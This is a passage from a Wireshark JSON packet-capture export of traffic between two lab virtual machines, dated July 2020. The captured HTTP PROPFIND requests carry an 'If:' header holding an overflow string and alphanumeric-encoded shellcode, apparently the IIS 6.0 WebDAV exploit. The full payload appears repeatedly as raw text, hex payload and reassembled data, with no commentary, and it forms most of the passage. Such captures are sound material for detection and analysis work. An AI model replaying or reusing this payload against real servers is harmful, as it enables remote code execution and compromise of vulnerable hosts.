FBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "381"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.817029000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.817029000",
|
||
"frame.time_delta": "0.000004000",
|
||
"frame.time_delta_displayed": "0.004359000",
|
||
"frame.time_relative": "17.067969000",
|
||
"frame.number": "388",
|
||
"frame.len": "299",
|
||
"frame.cap_len": "299",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "285",
|
||
"ip.id": "0x0000a49e",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00008bd5",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "35289",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "35289",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "61",
|
||
"tcp.len": "233",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3851918651",
|
||
"tcp.nxtseq": "1682",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1432677768",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000651f",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:50:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:50:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868624",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000437000",
|
||
"tcp.analysis.bytes_in_flight": "1681",
|
||
"tcp.analysis.push_bytes_sent": "1681"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000541000",
|
||
"tcp.time_delta": "0.000004000"
|
||
},
|
||
"tcp.payload": "42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "387",
|
||
"tcp.segment": "388",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1681",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4b:44:78:58:6d:55:6d:6c:75:50:59:66:6f:78:59:73:59:4e:4d:6f:69:41:6d:77:55:70:6a:4b:54:54:6c:5a:69:41:61:66:48:54:79:72:72:56:61:47:56:41:75:53:77:69:63:4d:62:47:6a:59:6b:4c:76:70:4a:67:6d:47:54:51:61:42:55:41:55:4e:62:58:49:75:53:4d:61:41:4d:78:43:56:61:e6:b1:88:e5:95:b5:e6:95:a6:e6:b9:9a:e7:95:9a:e7:91:95:e6:bd:8d:e5:85:89:e4:85:a7:e6:91:88:e6:a1:b6:e4:b9:85:e4:9d:ae:e5:a5:ad:e4:99:88:e6:85:8a:c8:82:c8:82:e1:8b:80:e6:a0:83:e7:8d:86:e5:99:b5:e6:99:93:e5:85:ab:e6:a1:93:e5:81:ac:e6:95:84:e4:b1:af:e6:a9:84:e5:9d:a6:e7:a1:90:e6:bd:b7:e4:89:aa:e7:a9:98:e7:a1:b1:e5:a5:87:e7:a9:81:e4:b1:84:e4:91:86:e4:a5:95:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:7a:6c:71:73:77:50:6c:66:48:62:50:41:73:69:58:4a:77:4b:4a:78:76:54:4b:46:53:56:53:4f:58:77:79:6b:57:4e:52:41:67:59:56:42:64:6c:5a:42:6e:77:63:6e:73:64:56:79:4d:77:41:72:4e:75:76:50:45:54:61:4f:6f:59:58:73:6d:69:58:6c:53:4f:62:44:64:4c:42:4d:6b:57:4b:65:53:e7:81:a6:e7:a1:b1:e6:a9:84:e4:91:90:e7:91:b5:e7:81:a1:e4:89:ad:e5:9d:ba:e6:a9:a9:e4:99:90:e5:85:b1:e6:b9:99:e5:a1:b7:e7:85:a3:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e6:85:83:e6:b1:93:e6:a1:90:e5:a1:85:e1:8f:80:e6:a0:83:e7:89:84:e4:95:a7:e4:9d:8c:e4:b1:b3:e4:99:af:e6:91:a8:e5:9d:b7:e4:b5:ba:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/KDxXmUmluPYfoxYsYNMoiAmwUpjKTTlZiAafHTyrrVaGVAuSwicMbGjYkLvpJgmGTQaBUAUNbXIuSMaAMxCVa<56><61><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/zlqswPlfHbPAsiXJwKJxvTKFSVSOXwykWNRAgYVBdlZBnwcnsdVyMwArNuvPETaOoYXsmiXlSObDdLBMkWKeS<65><53><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "390"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.821003000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.821003000",
|
||
"frame.time_delta": "0.000052000",
|
||
"frame.time_delta_displayed": "0.003974000",
|
||
"frame.time_relative": "17.071943000",
|
||
"frame.number": "397",
|
||
"frame.len": "297",
|
||
"frame.cap_len": "297",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "283",
|
||
"ip.id": "0x00002f23",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
